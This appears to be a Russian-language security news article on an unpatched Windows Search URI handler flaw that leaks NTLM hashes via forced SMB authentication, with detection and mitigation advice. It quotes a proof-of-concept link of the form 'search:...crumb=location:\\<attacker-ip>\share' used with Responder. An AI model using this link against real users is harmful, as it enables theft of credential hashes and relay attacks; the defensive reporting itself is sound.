Пользователи Windows снова столкнулись с угрозой утечки NTLM-учётных данных. Исследователи из компании Huntress обнаружили, что обработчик URI (унифицированного идентификатора ресурса) Windows Search некорректно обрабатывает переданные параметры. Это позволяет злоумышленникам принудительно инициировать исходящую SMB-аутентификацию (протокол для доступа к файлам и принтерам в сети) и перехватывать хеши NTLM. Примечательно, что уязвимость очень похожа на недавно исправленную CVE-2026-33829 в инструменте "Ножницы", однако до сих пор не получила собственного идентификатора и официального патча.
Уязвимость CVE-2026-33829
Проблема кроется в том, как Windows обрабатывает схемы URI "search:" и "search-ms:". Обе опираются на один и тот же COM-компонент (модель компонентных объектов Microsoft) - класс SearchExecute с идентификатором CLSID "{90b9bce2-b6db-4fd3-8451-35917ea1081b}", реализованный в библиотеке ExplorerFrame.dll. Из-за недостаточной проверки входных данных злоумышленник может встроить вредоносный UNC-путь (универсальное соглашение об именовании сетевых ресурсов) в специально сформированный URI. При переходе по такой ссылке система автоматически попытается подключиться к удалённому серверу, запустив процесс NTLM-аутентификации.
В результате на сторону атакующего утекает Net-NTLMv2-хеш (сетевая версия хеша учётных данных Windows). Хотя это не сами пароли в открытом виде, такой хеш можно использовать для NTLM-ретрансляционных атак (перехвата и перенаправления запросов аутентификации), офлайн-взлома или горизонтального перемещения внутри корпоративной сети. Ключевая опасность в том, что для атаки не требуется установка вредоносного кода или сложные цепочки эксплойтов - достаточно лишь одного клика пользователя.
Исследователи из Huntress продемонстрировали рабочий Proof-of-Concept (доказательство концепции). Атакующий настраивает SMB-слушатель (например, с помощью инструмента Responder) на своём компьютере. Затем жертва переходит по ссылке вида "search:query=test&crumb=location:\\<ip-атакующего>\share". Windows тут же пытается получить доступ к указанному UNC-пути, инициируя NTLM-аутентификацию. Примечательно, что сообщение об ошибке появляется лишь после того, как хеш уже был передан. Утечка происходит только один раз за сеанс пользователя, поэтому первый переход становится критическим.
Сходство с уязвимостью CVE-2026-33829 (которая затрагивала обработчик "ms-screensketch:") очевидно. Обе проблемы имеют одну и ту же первопричину - недостаточную проверку внешних путей - и приводят к идентичной утечке учётных данных. Тем не менее, новая вариация до сих пор не получила номер CVE (Common Vulnerabilities and Exposures - общепринятый перечень уязвимостей) и, соответственно, официального исправления.
Корпорация Microsoft классифицировала проблему как "ниже порога обслуживания", сославшись на процесс рассмотрения в каждом конкретном случае. Это создаёт серьёзную "слепую зону" для организаций, которые полагаются исключительно на уведомления CVE для отслеживания и устранения уязвимостей. С практической точки зрения атака весьма реалистична: злоумышленники могут встраивать вредоносные поисковые ссылки в фишинговые письма или веб-контент. Никакой загрузки файлов или выполнения кода не требуется - это снижает подозрения пользователей и затрудняет обнаружение средствами защиты. Аутентификация происходит в фоновом режиме, часто до того, как система отобразит какой-либо ответ.
Специалистам по информационной безопасности стоит обратить внимание на мониторинг подозрительного использования схем "search:" и "search-ms:" в почтовом трафике, активности браузера и прокси-логах. Исходящие SMB-соединения к внешним или ненадёжным IP-адресам по портам TCP 445 и 139 должны рассматриваться как индикаторы высокого риска. Неожиданные попытки NTLM-аутентификации к не корпоративным системам также могут свидетельствовать о попытке эксплуатации.
Для смягчения этой угрозы организациям рекомендуется в первую очередь блокировать исходящий SMB-трафик с конечных точек, которые не требуют его для работы. Это эффективно предотвращает утечку NTLM-хешей. Включение подписи SMB снижает риск ретрансляционных атак, а отключение NTLM-аутентификации через групповые политики обеспечивает более широкую защиту, хотя может повлиять на работу устаревших систем. Активное обнаружение через фильтрацию URI и сетевой мониторинг остаётся критически важным.
Данная уязвимость подчёркивает более широкую проблему корпоративной безопасности: патчинг на основе CVE сам по себе недостаточен для противодействия эволюционирующим техникам атак. Случай с обработчиком "search:" URI демонстрирует, как известные классы уязвимостей могут сохраняться в разных компонентах без формального отслеживания. Это подтверждает необходимость поведенческого обнаружения и многоуровневых защитных механизмов.
Ссылки
- https://www.cve.org/CVERecord?id=CVE-2026-33829
- https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829
